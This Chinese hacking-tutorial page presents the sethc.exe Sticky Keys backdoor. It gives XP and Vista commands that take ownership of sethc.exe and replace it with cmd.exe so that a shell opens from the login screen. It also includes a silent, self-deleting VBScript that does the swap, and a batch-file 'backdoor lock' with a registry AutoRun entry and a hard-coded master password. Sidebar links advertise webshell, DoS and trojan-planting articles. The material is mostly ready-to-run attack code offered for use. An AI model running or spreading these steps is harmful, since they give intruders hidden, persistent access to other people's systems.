变态入侵之有史以来最酷的Windows后门sethc.exe

所属分类: 实用技巧 / 安全教程 阅读数: 2126
收藏 0 赞 0 分享
后门原理: 

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 

XP: 

将安装源光盘弹出(或将硬盘上的安装目录改名) 
cd %widnir%\system32\dllcache 
ren sethc.exe *.ex~ 
cd %widnir%\system32 
copy /y cmd.exe sethc.exe 

VISTA: 

takeown /f c:\windows\system32\sethc.exe 
cacls c:\windows\system32\sethc.exe /G administrator:F 
然后按XP方法替换文件 

在登录界面按5此SHIFT,出来cmd shell,然后…… 

后门扩展: 
复制代码 代码如下:

Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)   
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   


第二句最有意思了.自动应答....以前就遇到过类似的问题 
再更新.加个自删除,简化代码...  
复制代码 代码如下:

On Error Resume Next   
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)  

后门锁扩展: 
allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 
用下面的后门锁的方法是 把代码保存为bdlock.bat 
然后修改注册表位置即可 
复制代码 代码如下:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="bdlock.bat"  

@Echo Off  
title 后门登陆验证  
color a  
cls  
set temprandom=%RANDOM%  
echo 请输入验证码:%temprandom%  
set/p check=  
if "%check%"=="%temprandom%%temprandom%" goto passcheck  
if "%check%"=="%temprandom%" (  
rem 后门服务器验证  
rem 如果没有后门验证服务器请rem注释掉下一行代码  
if exist \192.168.8.8\backdoor$\pass goto passcheck  
)  
echo 验证失败  
pause  
exit  
:passcheck  
echo 验证成功  
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx  
Set passcmdlock=http://blog.csdn.net/freexploit/  
:allyesno  
Set Errorlevel=>nul  
Echo 请输入验证密码?  
Set password=allyesno Is a pig>nul  
Set/p password=  
rem 万能密码  
if "%password%"=="allyesno is a sb" goto endx  
If %time:~1,1%==0 Set timechange=a  
If %time:~1,1%==1 Set timechange=b  
If %time:~1,1%==2 Set timechange=c  
If %time:~1,1%==3 Set timechange=d  
If %time:~1,1%==4 Set timechange=e  
If %time:~1,1%==5 Set timechange=f  
If %time:~1,1%==6 Set timechange=g  
If %time:~1,1%==7 Set timechange=h  
If %time:~1,1%==8 Set timechange=i  
If %time:~1,1%==9 Set timechange=j  
set/a sum=%time:~1,1%+%time:~1,1%  
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul   
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End  
Echo 请联系客服咨询正确密码!&Goto allyesno  
:End  
Set password=>nul  
Set Errorlevel=>nul  
Echo  

:endx  

更多精彩内容其他人还在看

如何防止QQ被盗密码 比较详细找回qq号的方法

今天小编教大家如何更高几率的找回QQ密码,需要的朋友可以参考一下
收藏 0 赞 0 分享

在肉鸡上架设全能服务器的方法介绍

肉鸡上架设服务器当看见别人有自己网站的时候,你是不是也很想有一个自己的WEB站点呢?可是建站需要空间,象偶这样的穷人都没钱买空间,只有自己动手,正所谓自己动手丰衣足食,别忘了,DIY永远是黑客的精神!
收藏 0 赞 0 分享

webshell查看IIS站点配置的方法

得到了网站的webshell我们就可以查看服务器的iis的所有站点了,试个不错的方法,如果安全设置好了,也不会有问题
收藏 0 赞 0 分享

让侮辱中国人的法国cnn网站完蛋

让侮辱中国人的法国cnn网站完蛋!!!只要你帮助打开一个网页!! 如何DOS攻击CNN网站? ?将这些文字复制,并保存成一个html文件,然后在浏览器中打开,按提示启用脚本,然后,每隔3秒钟将自动连接一次cnn网站(注意,是自动的,只要你不关闭浏览器窗口就可以了,也不会影响你
收藏 0 赞 0 分享

最新的无权限挂马方式

我写这文章并不是教大家怎么跑去挂马啊,挂马是不对的!不过有的时候真的很想做些让人觉得痛快的事情,因为我就碰到很多的管理员,你跟他说服务器有问题吧!他不信,你改些东西警告他吧,他比你还勤快,你一改他马上覆盖回去,让人真的很郁闷。
收藏 0 赞 0 分享

注册表导出管理员密码文件

来源:红狼 sa默认可以读sam键.应该。
收藏 0 赞 0 分享

不用xp_cmdshell照样执行命令

删除xp_cmdshell和xplog70.dll不用担心,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell 利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,现在好像没多少人想得起来了 主要是由于Jet允许调用VBA的shell()函
收藏 0 赞 0 分享

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0 赞 0 分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0 赞 0 分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
收藏 0 赞 0 分享
查看更多